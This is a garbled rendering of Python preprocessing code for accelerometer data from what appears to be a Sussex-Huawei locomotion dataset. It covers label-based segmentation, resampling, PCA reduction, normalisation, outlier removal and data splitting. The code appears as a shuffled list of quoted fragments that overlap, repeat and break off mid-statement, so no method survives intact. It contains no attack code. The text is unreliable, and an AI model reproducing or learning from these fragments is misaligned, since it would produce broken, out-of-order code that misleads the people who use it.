selected_columns=None, axis", "time unit, label data, remove nans') data = self.convert_unix_to_datetime(data, column = 'time', unit", "data), axis=1) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides", "if segments_combined is not None: segments_combined = segments_combined.reset_index() segments_combined.index = pandas.DatetimeIndex( segments_combined.index.astype('datetime64[1s]')) segments_aggregated.append(segments_combined)", "replacement_mode='quantile', columns=selected_columns, quantile=0.99 # current run @0.95 for classical approach via TS Fresh", "= self.convert_unix_to_datetime(data, column = 'time', unit = 'ms') data = self.label_data(data, labels) data", "and std is not None: if columns is not None: data[columns] = (data[columns]", "raise TypeError(type(data)) if mode == 'mean_estimate_gravity': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode == 'gyroscope': raise", "data = pandas.concat([data, data_segments[ind][selected_columns]], axis=axis) data = data.reset_index(drop=True) return data except (TypeError, NotImplementedError,", "steps necessary for inference. 
:param data: pandas.DataFrame :param params: List :return: pandas.DataFrame, pandas.DataFrame,", "@overrides def inference_split_process(self, data, config, meta_data): \"\"\" Apply all preprocessing steps necessary for", ":param args: :return: \"\"\" try: if data is None or target_columns is None", "self.de_segment_data(data_train_segments, selected_columns) data_train, mean_train, std_train = self.znormalize_quantitative_data(data_train, selected_columns[:-2]) data_train = self.remove_outliers_from_quantitative_data( data_train, replacement_mode='quantile',", "if mode == 'manhatten': reduced = data[columns].sum(axis=1).apply(numpy.abs, axis=1) old_index = data.index data =", "(len(labels) != len(data)): raise TypeError(self.messages.PROVIDED_FRAME_DOESNT_MATCH_DATA.value) return pandas.concat((labels, data), axis=1) except (TypeError, NotImplementedError, ValueError):", "mode: :param args: :return: \"\"\" try: if data is None or target_columns is", "traceback import os import pandas from sklearn.decomposition import PCA import numpy class SussexHuaweiPreprocessor(Preprocessor):", "isinstance(data, pandas.DataFrame) or not isinstance(freq, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'mean' or", "based on a label column, semantic segementation of a fixed interval. :param data:", "mode = 'mean') if segments_combined is None: segments_combined = segment else: segments_combined =", "if columns is not None: data[columns]=(data[columns]-data[columns].min())/(data[columns].max()-data[columns].min()) # to center around 0.0 substract 0.5", "for segment in selected_data_segments: data_segments.append(segment) return data_segments if mode == 'fixed_interval': segment_length =", "mode='labels', label_column='road_label', args=selected_road_labels ) for road_segment in road_segments: data_train_segments.append(road_segment) #Segment Test car_test_segments =", "\"\"\" Apply a dimensionality reduction technique to a data set. 
:param data: :param", "road_segment in road_segments: data_test_segments.append(road_segment) #Segment Valid car_valid_segments = self.segment_data(data_valid, mode='labels', label_column='coarse_label', args=selected_coarse_labels) data_valid_segments", "in range(len(data_train_segments)): data_train_segments[ind] = data_train_segments[ind].set_index('time') data_train_segments[ind] = self.resample_quantitative_data(data_train_segments[ind], freq=freq) # 8000 1.25 Hz", "data.set_index(data['time'], drop=True, inplace=True) print('Resample') data = self.resample_quantitative_data(data, freq=freq) # 8000 1.25 Hz print('Dimensionality", "import Preprocessor from pipeline.feature_engineering.preprocessing.replacement_strategies.mean_replacement_strategy import MeanReplacementStrategy from pipeline.feature_engineering.preprocessing.replacement_strategies.del_row_replacement_strategy import DelRowReplacementStrategy from pipeline.feature_engineering.preprocessing.replacement_strategies.replacement_val_replacement_strategy import", "pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'semantic': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode == 'labels':", "= args[0] aggregate = args[1] exact_length = args[2] segments_aggregated = [] split =", "data_train = data_train.loc[:, ~data_train.columns.duplicated()] data_test = data_test.loc[:, ~data_test.columns.duplicated()] data_valid = data_valid.loc[:, ~data_valid.columns.duplicated()] #print('Rolling", "outlieres either based on quantile or a threshold value. 
:param data: :param replacement_mode:", "== 'quantile': # Source for next 7 lines of code after comment: #", "road_segments: data_train_segments.append(road_segment) #Segment Test car_test_segments = self.segment_data(data_test, mode='labels', label_column='coarse_label', args=selected_coarse_labels) data_test_segments = []", "replacement_mode == 'mean': return MeanReplacementStrategy().replace(data, 'NaN') if replacement_mode == 'del_row': return DelRowReplacementStrategy().replace(data, 'NaN')", "re_represent_data(self, current_representation, target_representation, data): \"\"\" Change representation of a data set. :param current_representation:", "not isinstance(unit, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) data[column] = pandas.to_datetime(data[column], unit=unit) return data except (TypeError,", "pandas.DataFrame \"\"\" try: if data is None or replacement_mode is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value)", "data[column].between( data[column].quantile(1.0 - quantile), data[column].quantile(quantile) ) data[column] = data[column][not_outliers] index_names = data[~not_outliers].index data.drop(index_names,", "set. 
:param data: :param columns: :param mean: :param std: :return: \"\"\" try: if", "mode is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode", "TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) return data, mean, std except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception:", "None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if replacement_mode == 'mean':", "= ['acceleration_abs'] data, mean, std = self.znormalize_quantitative_data(data, selected_columns, mean_train, std_train) data = self.remove_outliers_from_quantitative_data(", "* train_sz) valid_len = int(data_len * valid_sz) data_train, data_test_valid = data.head(train_len), data.tail(test_len+valid_len) data_test", "road_segments: data_test_segments.append(road_segment) #Segment Valid car_valid_segments = self.segment_data(data_valid, mode='labels', label_column='coarse_label', args=selected_coarse_labels) data_valid_segments = []", "= data.index data = pandas.concat([data, reduced], axis=1) data = data.rename(columns={0: reduced_column_name}) data =", "steps necessary for training. 
:param data: pandas.DataFrame :param params: List :return: pandas.DataFrame, pandas.DataFrame,", "self.de_segment_data(data_valid_segments, selected_columns) data_valid, mean_valid, std_valid = self.znormalize_quantitative_data(data_valid, selected_columns[:-2], mean_train, std_train) data_valid = self.remove_outliers_from_quantitative_data(", "pandas.concat([data, data_segments[ind][selected_columns]], axis=axis) data = data.reset_index(drop=True) return data except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc())", "os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def min_max_normalize_quantitative_data(self, data, columns=None): \"\"\" Apply min-max-normalization", "data[columns].std() else: mean = data.mean() std = data.std() data = (data - data.mean())", "min_length_subsegements: segment = segment.reset_index() segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) segment = self.resample_quantitative_data(segment, freq=\"{}s\".format(segment_length), mode =", "pipeline.feature_engineering.preprocessing.replacement_strategies.replacement_val_replacement_strategy import ReplacementValReplacementStrategy from overrides import overrides import traceback import os import pandas", "= reduced.reset_index(drop=True) old_index = data.index data = data.reset_index(drop=True) data = pandas.concat([data, reduced], axis=1)", "TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if replacement_mode == 'mean': return MeanReplacementStrategy().replace(data,", "= self.reduce_quantitativ_data_dimensionality( data=data_test_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs'", "config['pre_proc_movement_type_label'] #[5] selected_road_labels = 
config['pre_proc_road_type_label'] #[1, 3] freq = config['pre_proc_resample_freq'] #'1000ms' print('Convert time", "#print(params) labels = labels test_sz = config['pre_proc_test_sz'] train_sz = config['pre_proc_training_sz'] valid_sz = config['pre_proc_validation_sz']", "road_segments = self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels ) for road_segment in road_segments: data_valid_segments.append(road_segment) print('Resample')", "data_segments.append(segment) return data_segments if mode == 'fixed_interval': segment_length = args[0] aggregate = args[1]", "is 'default_val' :return: pandas.DataFrame \"\"\" try: if data is None or replacement_mode is", "column in columns): raise TypeError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if columns is not None: data[columns]=(data[columns]-data[columns].min())/(data[columns].max()-data[columns].min()) # to", "raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if not all(column in data.keys()", "TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if not all(column in data.keys() for", ") print('Normalizing, outlier removal') selected_columns = ['acceleration_abs'] data, mean, std = self.znormalize_quantitative_data(data, selected_columns,", "mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) #Valid for", "except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def re_represent_data(self, current_representation, target_representation, data): \"\"\" Change representation", "self.resample_quantitative_data(segment, freq=\"{}s\".format(segment_length), mode = 'mean') if segments_combined is None: segments_combined = 
segment else:", "os._exit(2) @overrides def encode_categorical_features(self, data, mode, columns, encoding_function): \"\"\" Encode categorical features using", "= None): \"\"\" Removes outlieres either based on quantile or a threshold value.", "= self.remove_outliers_from_quantitative_data( data, replacement_mode='quantile', columns=selected_columns, quantile=0.99 # current run @0.95 for classical approach", "except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def de_segment_data(self,", "old_index = data.index data = data.reset_index(drop=False) data = data.set_index(old_index) return data if replacement_mode", "lambda df, chunk_size : numpy.array_split(df, len(df) // chunk_size + 1, axis=0) # 1.", "self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def de_segment_data(self, data_segments, selected_columns=None, axis =", "euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) #Valid for ind in range(len(data_valid_segments)): data_valid_segments[ind] =", "params: List :return: pandas.DataFrame, pandas.DataFrame, pandas.DataFrame \"\"\" print('Fetch params') #print(params) labels = labels", "Converts unix time stamps to date time. 
:param data: :param column: :param unit:", "than euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) print('Normalizing, outlier removal') #Train selected_columns =", "mean_train, std_train) data = self.remove_outliers_from_quantitative_data( data, replacement_mode='quantile', columns=selected_columns, quantile=0.99 # current run @0.95", "TypeError(type(data)) if mode == 'mean_estimate_gravity': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode == 'gyroscope': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value)", "pandas.DatetimeIndex(data.index.astype('datetime64[1s]')) #2. Segment data segments = split(data, segment_length) if not exact_length: for segment", "1, axis=0) # 1. Ensure index is datetime index and standardize type data.index", ":param columns: :param mean: :param std: :return: \"\"\" try: if data is None:", "in road_segments: data_train_segments.append(road_segment) #Segment Test car_test_segments = self.segment_data(data_test, mode='labels', label_column='coarse_label', args=selected_coarse_labels) data_test_segments =", "['acceleration_x', 'acceleration_y', 'acceleration_z'] acelerometer_columns = [config['data_set_column_names'][1:][0], config['data_set_column_names'][1:][1], config['data_set_column_names'][1:][2]] selected_coarse_labels = config['pre_proc_movement_type_label'] #[5] selected_road_labels", "None): \"\"\" Removes outlieres either based on quantile or a threshold value. 
:param", "TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(mode, str) or not isinstance(reduced_column_name, str):", "if len(target_columns) != len(args): raise TypeError(self.messages.PROVIDED_ARRAYS_DONT_MATCH_LENGTH.value) for ind, column in enumerate(target_columns): data[column] =", "raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode == 'gravity': if len(target_columns) != len(args): raise TypeError(self.messages.PROVIDED_ARRAYS_DONT_MATCH_LENGTH.value) for", "ind in range(len(data_train_segments)): data_train_segments[ind] = data_train_segments[ind].set_index('time') data_train_segments[ind] = self.resample_quantitative_data(data_train_segments[ind], freq=freq) # 8000 1.25", "raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) for column in columns: data[column] = encoding_function(data[column]) return data raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value)", "(isinstance(data, pandas.DataFrame) and isinstance(labels, pandas.DataFrame)): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if (len(labels) != len(data)): raise TypeError(self.messages.PROVIDED_FRAME_DOESNT_MATCH_DATA.value)", "data = data.reset_index(drop=True) data = data.set_index(old_index) return data if mode == 'manhatten': reduced", "except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def remove_unwanted_labels(self, data, unwanted_labels, replacement_mode): \"\"\" Remove rows", "a fixed interval. 
:param data: :param mode: :param label_column: :param args: :return: \"\"\"", "data, replacement_mode='quantile', columns=selected_columns, quantile=0.99 # current run @0.95 for classical approach via TS", "Segment data segments = split(data, segment_length) if not exact_length: for segment in segments:", ":return: pandas.DataFrame, pandas.DataFrame, pandas.DataFrame \"\"\" print('Fetch params') acelerometer_columns = [config['data_set_column_names'][1:][0], config['data_set_column_names'][1:][1], config['data_set_column_names'][1:][2]] freq", "target_columns, mode, args=None): \"\"\" Project accelerometer data from local vehicle coordinates to a", "Removes outlieres either based on quantile or a threshold value. :param data: :param", "https://en.wikipedia.org/wiki/Principal_component_analysis pca = PCA(n_components=1) pca.fit(data[columns]) reduced = pandas.DataFrame((numpy.dot(pca.components_, data[columns].T).T)) reduced = reduced.rename(columns={0:reduced_column_name}) reduced", "grouper = non_sequence.cumsum().values selected_data_segments = [group for _, group in selected_data.groupby(grouper)] for segment", "(TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def resample_quantitative_data(self, data,", "from sklearn.decomposition import PCA import numpy class SussexHuaweiPreprocessor(Preprocessor): def __init__(self): super().__init__() @overrides def", "// chunk_size + 1, axis=0) # 1. Ensure index is datetime index and", "segment in segments: segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) return segments #3. Remove segments that are", "Apply min-max-normalization to a data set. :param data: :param columns: :return: \"\"\" try:", "for training. 
:param data: pandas.DataFrame :param params: List :return: pandas.DataFrame, pandas.DataFrame, pandas.DataFrame \"\"\"", "classical approach via TS Fresh )[:-2] #Valid data_valid = self.de_segment_data(data_valid_segments, selected_columns) data_valid, mean_valid,", "classical approach via TS Fresh )[:-2] #Test data_test = self.de_segment_data(data_test_segments, selected_columns) data_test, mean_test,", "if not isinstance(data, pandas.DataFrame) or not isinstance(mode, str) or not isinstance(reduced_column_name, str): raise", "raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) data[column] = pandas.to_datetime(data[column], unit=unit) return data except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc())", "pandas.DataFrame, pandas.DataFrame \"\"\" print('Fetch params') acelerometer_columns = [config['data_set_column_names'][1:][0], config['data_set_column_names'][1:][1], config['data_set_column_names'][1:][2]] freq = config['pre_proc_resample_freq']", "return data @overrides def training_split_process(self, data, config, labels): \"\"\" Apply all preprocessing steps", "print('Convert time unit, remove nans') data = self.convert_unix_to_datetime(data, column='time', unit='ms') data = self.remove_nans(data,", "in range(len(data_train_segments)): data_train_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_train_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for", "min_length_subsegements.append(segment) if not aggregate: for segment in min_length_subsegements: segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) return min_length_subsegements", "better than euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) print('Normalizing, outlier removal') #Train selected_columns", "== 'semantic': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode == 'labels': # 1. 
Select all data", ":param replacement_value: any type, used as value if replacment_mode is 'default_val' :return: pandas.DataFrame", "Select all data with desired label value data_segments = [] for target_label in", "os._exit(2) @overrides def remove_unwanted_labels(self, data, unwanted_labels, replacement_mode): \"\"\" Remove rows that have an", "TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'custom_function': if encoding_function is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) for column", "isinstance(replacement_mode, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if replacement_mode == 'del_row': return DelRowReplacementStrategy().replace(data, 'unwanted_labels', unwanted_labels) raise", "if mode == 'fixed_interval': segment_length = args[0] aggregate = args[1] exact_length = args[2]", "mode is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(mode, str)", "data: :return: \"\"\" try: if data is None or labels is None: raise", "in range(len(data_segments)): if data is None: data = data_segments[ind][selected_columns] else: data = pandas.concat([data,", "mode, reduced_column_name = 'reduced', columns = None): \"\"\" Apply a dimensionality reduction technique", "(TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def project_accelerometer_to_global_coordinates(self, data,", "a data set. 
:param data: :param mode: :param reduced_column_name: :param columns: :return: \"\"\"", "str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if replacement_mode == 'del_row': return DelRowReplacementStrategy().replace(data, 'unwanted_labels', unwanted_labels) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value)", "= PCA(n_components=1) pca.fit(data[columns]) reduced = pandas.DataFrame((numpy.dot(pca.components_, data[columns].T).T)) reduced = reduced.rename(columns={0:reduced_column_name}) reduced = reduced.reset_index(drop=True)", "= (data[columns] - data[columns].mean()) / data[columns].std() else: mean = data.mean() std = data.std()", "is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(unwanted_labels, list) or", "segment.reset_index() segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) segment = self.resample_quantitative_data(segment, freq=\"{}s\".format(segment_length), mode = 'mean') if segments_combined", "and std is None: if columns is not None: mean = data[columns].mean() std", "mode == 'pca': # Source: # https://stackoverflow.com/questions/23282130/principal-components-analysis-using-pandas-dataframe # https://stackoverflow.com/questions/54260920/combine-merge-dataframes-with-different-indexes-and-different-column-names # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.append.html # https://en.wikipedia.org/wiki/Principal_component_analysis", "old_index = data.index data = pandas.concat([data, reduced], axis=1) data = data.rename(columns={0: reduced_column_name}) data", "car_valid_segments: road_segments = self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels ) for road_segment in road_segments: data_valid_segments.append(road_segment)", "range(len(data_train_segments)): data_train_segments[ind] = data_train_segments[ind].set_index('time') 
data_train_segments[ind] = self.resample_quantitative_data(data_train_segments[ind], freq=freq) # 8000 1.25 Hz #Test", ") #Valid for ind in range(len(data_valid_segments)): data_valid_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_valid_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works", "TS Fresh )[:-2] #Valid data_valid = self.de_segment_data(data_valid_segments, selected_columns) data_valid, mean_valid, std_valid = self.znormalize_quantitative_data(data_valid,", "# https://stackoverflow.com/questions/42698421/pandas-to-datetime-from-milliseconds-produces-incorrect-datetime try: if data is None or column is None or unit", "columns, list): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'custom_function': if encoding_function is None: raise", "is not None: segments_combined = segments_combined.reset_index() segments_combined.index = pandas.DatetimeIndex( segments_combined.index.astype('datetime64[1s]')) segments_aggregated.append(segments_combined) return segments_aggregated", "stamps to date time. :param data: :param column: :param unit: :return: \"\"\" #", "= data_segments[ind][selected_columns] else: data = pandas.concat([data, data_segments[ind][selected_columns]], axis=axis) data = data.reset_index(drop=True) return data", "better than euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) #Test for ind in range(len(data_test_segments)):", "https://stackoverflow.com/questions/54260920/combine-merge-dataframes-with-different-indexes-and-different-column-names # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.append.html # https://en.wikipedia.org/wiki/Principal_component_analysis pca = PCA(n_components=1) pca.fit(data[columns]) reduced = pandas.DataFrame((numpy.dot(pca.components_, data[columns].T).T))", "for inference. 
:param data: pandas.DataFrame :param params: List :return: pandas.DataFrame, pandas.DataFrame, pandas.DataFrame \"\"\"", "below calculation # https://en.wikipedia.org/wiki/Quaternions_and_spatial_rotation # https://en.wikipedia.org/wiki/Homogeneous_coordinates # #https://stackoverflow.com/questions/2422750/in-opengl-vertex-shaders-what-is-w-and-why-do-i-divide-by-it for ind, column in enumerate(target_columns):", "https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.resample.html # https://jakevdp.github.io/PythonDataScienceHandbook/03.11-working-with-time-series.html try: if data is None or freq is None: raise", "https://stackoverflow.com/questions/42698421/pandas-to-datetime-from-milliseconds-produces-incorrect-datetime try: if data is None or column is None or unit is", "or too short after splitting min_length_subsegements = [] for segment in segments: if", "removal') #Train selected_columns = ['acceleration_abs', 'road_label', 'id'] # 'acceleration_abs' data_train = self.de_segment_data(data_train_segments, selected_columns)", "or a threshold value. :param data: :param replacement_mode: :param columns: :param quantile: :param", "TS Fresh )[:-2] data_train = data_train.loc[:, ~data_train.columns.duplicated()] data_test = data_test.loc[:, ~data_test.columns.duplicated()] data_valid =", "self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def resample_quantitative_data(self, data, freq, mode =", "unwanted label. 
:param data: :param unwanted_labels: :param replacement_mode: :return: \"\"\" try: if data", "Fresh )[:-2] #Valid data_valid = self.de_segment_data(data_valid_segments, selected_columns) data_valid, mean_valid, std_valid = self.znormalize_quantitative_data(data_valid, selected_columns[:-2],", "TypeError(self.messages.PROVIDED_ARRAYS_DONT_MATCH_LENGTH.value) # Source for theory behind below calculation # https://en.wikipedia.org/wiki/Quaternions_and_spatial_rotation # https://en.wikipedia.org/wiki/Homogeneous_coordinates #", "#data_train = self.remove_nans(data_train, replacement_mode='del_row') #data_test = self.remove_nans(data_test, replacement_mode='del_row') #data_valid = self.remove_nans(data_valid, replacement_mode='del_row') #print(data_train.head(100))", "None or replacement_mode is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value)", "training_split_process(self, data, config, labels): \"\"\" Apply all preprocessing steps necessary for training. 
:param", "in segments: if segment.shape[0] == segment_length: min_length_subsegements.append(segment) if not aggregate: for segment in", "data_train.loc[:, ~data_train.columns.duplicated()] data_test = data_test.loc[:, ~data_test.columns.duplicated()] data_valid = data_valid.loc[:, ~data_valid.columns.duplicated()] #print('Rolling mean smoothing')", "freq=freq) #Valid for ind in range(len(data_valid_segments)): data_valid_segments[ind] = data_valid_segments[ind].set_index('time') data_valid_segments[ind] = self.resample_quantitative_data(data_valid_segments[ind], freq=freq)", "data: :param replacement_mode: :param columns: :param quantile: :param threshold: :return: \"\"\" try: if", "'replacement_val': return ReplacementValReplacementStrategy().replace(data, 'NaN', replacement_vals=replacement_value) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1)", "non-subsequent indices # Source for next 3 lines after comment: # https://stackoverflow.com/questions/56257329/how-to-split-a-dataframe-based-on-consecutive-index non_sequence", "= non_sequence.cumsum().values selected_data_segments = [group for _, group in selected_data.groupby(grouper)] for segment in", "meta_data['mean_train'] std_train = meta_data['std_train'] print('Convert time unit, remove nans') data = self.convert_unix_to_datetime(data, column='time',", "data_test_valid.head(test_len) data_valid = data_test_valid.tail(valid_len) print('Segment by labels') #Segment Train car_train_segments = self.segment_data(data_train, mode='labels',", "if segments_combined is None: segments_combined = segment else: segments_combined = pandas.concat([segments_combined, segment], axis=0)", "TypeError(self.messages.PROVIDED_FRAME_DOESNT_MATCH_DATA.value) return pandas.concat((labels, data), axis=1) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) 
except Exception:", "std else: data = (data - mean) / std else: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) return", "None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'semantic':", "SussexHuaweiPreprocessor(Preprocessor): def __init__(self): super().__init__() @overrides def segment_data(self, data, mode, label_column=None, args=None): \"\"\" Segements", "self.logger.error(traceback.format_exc()) os._exit(2) @overrides def label_data(self, labels, data): \"\"\" Combines labels vector and data", "0.0 substract 0.5 return data except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception:", "!= 1 grouper = non_sequence.cumsum().values selected_data_segments = [group for _, group in selected_data.groupby(grouper)]", "os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def inference_split_process(self, data, config, meta_data): \"\"\" Apply", "Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def remove_outliers_from_quantitative_data(self, data, replacement_mode, columns, quantile = None, threshold", "std except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def", "== 'manhatten': reduced = data[columns].sum(axis=1).apply(numpy.abs, axis=1) old_index = data.index data = pandas.concat([data, reduced],", "function. 
:param data: :param mode: :param columns: :param encoding_function: :return: \"\"\" try: if", "str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'mean' or mode is None: return data.resample(freq).mean()", "data[column] = pandas.to_datetime(data[column], unit=unit) return data except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except", "data, config, labels): \"\"\" Apply all preprocessing steps necessary for training. :param data:", "split(data, segment_length) if not exact_length: for segment in segments: segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) return", "'time', unit = 'ms') data = self.label_data(data, labels) data = self.remove_nans(data, replacement_mode='del_row') print('Train,", "= data.set_index(old_index) return data if mode == 'manhatten': reduced = data[columns].sum(axis=1).apply(numpy.abs, axis=1) old_index", "NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def znormalize_quantitative_data(self, data, columns", "is None or unit is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or", "@overrides def remove_unwanted_labels(self, data, unwanted_labels, replacement_mode): \"\"\" Remove rows that have an unwanted", "None or target_columns is None or mode is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not", "a label column, semantic segementation of a fixed interval. :param data: :param mode:", "de_segment_data(self, data_segments, selected_columns=None, axis = 0): \"\"\" Desegements as time series. 
:param data_segments:", "comment: # https://stackoverflow.com/questions/56257329/how-to-split-a-dataframe-based-on-consecutive-index non_sequence = pandas.Series(selected_data.index).diff() != 1 grouper = non_sequence.cumsum().values selected_data_segments =", "than euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) #Valid for ind in range(len(data_valid_segments)): data_valid_segments[ind]", "= data_train.loc[:, ~data_train.columns.duplicated()] data_test = data_test.loc[:, ~data_test.columns.duplicated()] data_valid = data_valid.loc[:, ~data_valid.columns.duplicated()] #print('Rolling mean", "columns: :param mean: :param std: :return: \"\"\" try: if data is None: raise", "None or columns is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not", "mode == 'fixed_interval': segment_length = args[0] aggregate = args[1] exact_length = args[2] segments_aggregated", "lines of code after comment: # https://nextjournal.com/schmudde/how-to-remove-outliers-in-data for column in columns: not_outliers =", "def reduce_quantitativ_data_dimensionality(self, data, mode, reduced_column_name = 'reduced', columns = None): \"\"\" Apply a", "args=selected_road_labels ) for road_segment in road_segments: data_test_segments.append(road_segment) #Segment Valid car_valid_segments = self.segment_data(data_valid, mode='labels',", "(TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def de_segment_data(self, data_segments,", ":param data: :param freq: :param mode: :return: \"\"\" # Source: # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.resample.html #", "is None: segments_combined = segment else: segments_combined = pandas.concat([segments_combined, segment], axis=0) if segments_combined", "label_column='road_label', 
